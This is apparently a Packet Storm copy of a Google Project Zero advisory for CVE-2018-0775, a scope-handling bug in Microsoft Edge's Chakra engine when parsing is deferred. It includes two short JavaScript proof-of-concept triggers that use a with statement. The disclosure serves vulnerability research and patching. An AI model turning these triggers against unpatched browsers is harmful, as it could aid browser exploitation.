Microsoft Edge Chakra Deferred Parsing

2018-01-18T00:00:00
ID PACKETSTORM:145952
Type packetstorm
Reporter Google Security Research
Modified 2018-01-18T00:00:00

Description

                                        
                                            `Microsoft Edge: Chakra: Deferred parsing makes wrong scopes #2  
  
CVE-2018-0775  
  
  
Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar to <a href="/p/project-zero/issues/detail?id=1310" title="Microsoft Edge: Chakra: Deferred parsing makes wrong scopes" class="closed_ref" rel="nofollow"> issue 1310 </a>.  
  
PoC:
// Enable the flag using '\n'.repeat(0x1000)
eval(`(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());` + '\n'.repeat(0x1000));

PoC 2:
// ./ch poc.js -ForceDeferParse
(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  

Found by: lokihardt